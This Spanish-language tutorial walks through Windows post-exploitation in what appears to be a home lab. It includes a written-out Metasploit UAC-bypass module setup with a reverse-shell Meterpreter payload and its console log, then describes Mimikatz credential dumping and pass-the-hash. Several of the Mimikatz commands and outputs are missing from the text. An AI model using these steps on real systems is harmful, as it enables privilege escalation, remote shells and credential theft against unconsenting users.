Volcado de memoria con Mimikatz
De las herramientas mas famosas para las Post-Explotacion en Windows es la deminada Mimikatz, es una herramienta la cual tiene muchas funciones para dumpear hashes, contraseñas, crear claves, etc...
Podemos encontrar mas informacion en el siguiente link:
URL = Mimikatz GitHub
Lo que primero haremos sera comprometer la maquina windows teniendo un meterpreter desde metasploit, lo podremos hacer como en las anteriores veces con el modulo web_delivery, una vez que obtengamos una shell, haremos lo siguiente.
Vamos a escalar privilegios bypasseando el UAC como hicimos anteriormente.
use windows/local/bypassuac_fodhelperLa configuracion:
set session 1
set target 1
set LHOST <IP>
set LPORT 5555
set payload windows/x64/meterpreter/reverse_tcp
exploitInfo:
*] Started reverse TCP handler on 192.168.5.186:5555
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\system32\cmd.exe /c C:\Windows\System32\fodhelper.exe
[*] Sending stage (201798 bytes) to 192.168.5.181
[*] Cleaining up registry keys ...
[*] Meterpreter session 2 opened (192.168.5.186:5555 -> 192.168.5.181:49778) at 2024-11-22 04:08:21 -0500
meterpreter >Ahora lo que vamos hacer es cargar mimikatz con el siguiente comando:
Y con help kiwi podremos ver todos los comandos.
Antes haremos un getsystem para ser administradores.
Si nosotros ponemos lo siguiente para que nos vuelque todas las credenciales que encuentre en memoria:
Info:
Podremos ver que en concreto saco las credenciales (hash) de un usuario llamado d1se0, pero tampoco nos sirve mucho ya que no tenemos credenciales en texto plano.
Ahora vamos a utilizar el lenguaje nativo de mimikatz para dumpear las contraseñas que estan injectadas en memoria de la siguiente forma:
Info:
Y como vemos en esta seccion:
Nos esta dando la contraseña en texto plano del usuario d1se0.
En tal caso de que a lo mejor solo obtuvieramos los hashes NTLM se podria hacer un Pass-The-Hash con dicho hash para autenticarte como dicho usuario sin saber su contraseña y aunque se cambie la contraseña podras seguir pudiendo autenticarte, o tambien se puede intentar crackear el hash de forma que te de la contraseña en texto plano.
Last updated